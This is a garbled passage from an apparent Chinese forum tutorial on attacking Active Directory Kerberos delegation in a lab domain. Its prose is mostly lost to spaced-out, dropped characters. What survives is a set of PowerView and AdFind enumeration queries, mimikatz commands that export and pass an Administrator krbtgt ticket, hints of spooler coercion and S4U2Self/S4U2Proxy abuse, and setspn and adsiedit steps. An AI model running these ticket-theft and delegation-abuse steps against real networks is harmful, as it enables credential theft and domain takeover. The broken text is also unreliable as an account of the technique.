[18609] 2021-08-04_内网渗透|域内委派详解

文档创建者:s7ckTeam
浏览次数:5
最后更新:2025-01-18
2021-08-04_内网渗透|域内委派详解   2 2 d d b b c   H A C K   2 0 2 1 - 0 8 - 0 4 #   , 2 0 #   , 1 使   A 访 访 B B A 访 访 C   c o m p u t e r s   S Q L S e r v e r , M Y S Q L S P N
1 . p o w e r s p l o i t p o w e r v i e w     2 . A D F i n d     I m p o r t - M o d u l e   . P o w e r V i e w . p s 1 ; G e t - N e t C o m p u t e r   - U n c o n s t r a i n e d   - D o m a i n   h i r o . c o m G e t - N e t U s e r   - U n c o n s t r a i n e d   - D o m a i n   h i r o . c o m   |   s e l e c t   n a m e A d F i n d . e x e   - b   " D C = h i r o , D C = c o m "   - f   " ( & ( s a m A c c o u n t T y p e = 8 0 5 3 0 6 3 6 8 ) ( u s e r A c c o u n t C o n t r o l : 1 . 2 . 8 4 0 . 1 1 3 5 5 6 . 1 . 4 . 8 0 3 : = 5 2 4 2 8 8 ) ) "   c n   d i s t i n g u i s h e d N a m e
1 . e m p i r e p o w e r v i e w     2 . A D F i n d :     u s e r 访 s e r v e r A D C D C s e r v e r A T G T S T s e r v e r A   s e r v e r A S T T G T T G T l s a s s s e r v e r A 使 使 T G T u s e r 访 访 A d F i n d . e x e   - b   " D C = h i r o , D C = c o m "   - f   " ( & ( s a m A c c o u n t T y p e = 8 0 5 3 0 6 3 6 9 ) ( u s e r A c c o u n t C o n t r o l : 1 . 2 . 8 4 0 . 1 1 3 5 5 6 . 1 . 4 . 8 0 3 : = 5 2 4 2 8 8 ) ) "   c n   d i s t i n g u i s h e d N a m e I m p o r t - M o d u l e   . p o w e r v i e w . p s 1 ; G e t - D o m a i n C o m p u t e r   - T r u s t e d T o A u t h   - D o m a i n   h i r o . c o m   |   s e l e c t   n a m e G e t - D o m a i n U s e r   - T r u s t e d T o A u t h   - D o m a i n   h i r o . c o m   |   s e l e c t   n a m e A d F i n d . e x e   - b   " D C = h i r o , D C = c o m "   - f   " ( & ( s a m A c c o u n t T y p e = 8 0 5 3 0 6 3 6 8 ) ( m s d s - a l l o w e d t o d e l e g a t e t o = * ) ) "   c n   d i s t i n g u i s h e d N a m e   m s d s - a l l o w e d t o d e l e g a t e t o A d F i n d . e x e   - b   " D C = h i r o , D C = c o m "   - f   " ( & ( s a m A c c o u n t T y p e = 8 0 5 3 0 6 3 6 9 ) ( m s d s - a l l o w e d t o d e l e g a t e t o = * ) ) "   c n   d i s t i n g u i s h e d N a m e   m s d s - a l l o w e d t o d e l e g a t e t o
访 访 T G T 访 访 h i r o . c o m   W I N - K O N G   I P 1 9 2 . 1 6 8 . 2 2 8 . 1 0   a d m i n i s t r a t o r   W I N - E 6 F R 4 H V B P C I W I N - E 6 F R 4 H V B P C I
a d s i e d i t . m s c W I N - E 6 F R 4 H V B P C I u s e r A c c o u n t C o n t r o l T R U S T E D _ F O R _ D E L E G A T I O N
访 W I N - E 6 F R 4 H V B P C I W I N - E 6 F R 4 H V B P C I m i m i k a t z p r i v i l e g e : : d e b u g
s e k u r l s a : : t i c k e t s   / e x p o r t m i m i k a t z 访 k e r b e r o s : : p t t   [ 0 ; 1 1 e e a a ] - 2 - 0 - 6 0 8 1 0 0 0 0 - A d m i n i s t r a t o r @ k r b t g t - H I R O . C O M . k i r b i k e r b e r o s : : l i s t + s p o o l e r + s p o o l e r s e r v e r 2 0 1 2 s e r v e r 2 0 1 6
w i n d o w s   s e r v e r   2 0 0 3 K e r b e r o s S 4 U S 4 U S e r v i c e   f o r   U s e r   t o   S e l f   ( )   S e r v i c e   f o r   U s e r   t o   P r o x y   ( ) K D C S 4 U 2 p r o x y T G T K D C S T 1 S T 1 S 4 U 2 p r o x y   S T N T L M T G S S 4 U 2 P r o x y A 使 K D C B S T 1 A S T 1 S 4 U 2 p r o x y S T 1 访 访 S T 2   使 A S T 1 K D C 访 B S T 2 S T 2 A A 访 B S 4 U 2 S e l f S 4 U 2 p r o x y S 4 U 2 s e l f K e r b e r o s ( S T 1 ) S 4 U 2 p r o x y S T 2 S 4 U 2 S e l f S 4 U 2 S e l f T G S S 4 U 2 p r o x y
u s e r 访 s e r v i c e A D C k e r b e r o s u s e r T G T S T 1 u s e r 使 S T 1 s e r v i c e A 访 s e r v i c e A s e r v i c e B s e r v i c e A 使 使 S 4 U 2 P r o x y S T 1 D C s e r v i c e A 访 访 s e r v i c e B S T 2 , s e r v i c e A s e r v i c e B 访 访 H a s h h i r o . c o m   : W I N - K O N G @ 1 9 2 . 1 6 8 . 2 2 8 . 1 0   a d m i n i s t r a t o r   W I N - R R I 9 T 9 S N 8 5 D @ 1 9 2 . 1 6 8 . 2 2 8 . 1 5   w i n 7 w i n 7 S P N s e t s p n   - S   c i f s / W I N - R R I 9 T 9 S N 8 5 D . h i r o . c o m   w i n 7 S T 1 T G T 访 S 4 U 访 S T 2
s e t s p n   - L   w i n 7 w i n 7 访 c i f s 访 访 a d s i e d i t . m s c w i n 7 u s e r A c c o u n t C o n t r o l T R U S T E D _ T O _ A U T H E N T I C A T E _ F O R _ D E L E G A T I O N
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则